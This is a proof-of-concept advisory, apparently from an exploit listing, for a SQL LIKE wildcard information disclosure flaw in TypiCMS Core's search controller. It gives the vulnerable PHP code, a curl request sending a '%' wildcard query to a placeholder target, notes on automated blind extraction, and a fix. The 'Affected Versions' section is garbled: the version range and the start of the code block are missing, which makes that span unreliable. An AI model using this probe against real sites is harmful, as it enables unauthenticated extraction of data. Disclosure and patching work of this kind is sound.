Share
## https://sploitus.com/exploit?id=5B5D068E-CE5E-554B-BA2D-316D029FD92A
# TypiCMS Search LIKE Wildcard Information Disclosure

A proof-of-concept for a LIKE wildcard information disclosure vulnerability in TypiCMS Core.

## Vulnerability Type
Information Disclosure / SQL LIKE Wildcard Injection

## Affected Component
`TypiCMS\Modules\Core\Http\Controllers\SearchPublicController` โ€” Search functionality

## Affected Versions
TypiCMS Core  $data) {
    $query = $model->query()->where(function ($query) use ($words, $columns) {
        foreach ($columns as $column) {
            foreach ($words as $word) {
                $word = addslashes($word);  // % and _ NOT escaped
                $query->whereRaw(
                    "`$column` LIKE '%$word%' COLLATE utf8mb4_unicode_ci"
                );
            }
        }
    });
}
```

## PoC
```bash
# Search for content starting with "a" (unauthenticated)
curl "http://target.com/en/search?query=a%25"

# Blind extraction script included: poc.py
```

## Impact
- Unauthenticated data extraction via blind search
- Bypass of 3-char minimum search length
- Automatable character-by-character extraction

## Fix
Replace `addslashes($word)` with `addcslashes($word, '%_')` or use parameterized queries.

## Reference
- https://github.com/Reznovs/TypiCMS-Search-LIKE-Wildcard-Info-Disclosure
- https://github.com/typicms/core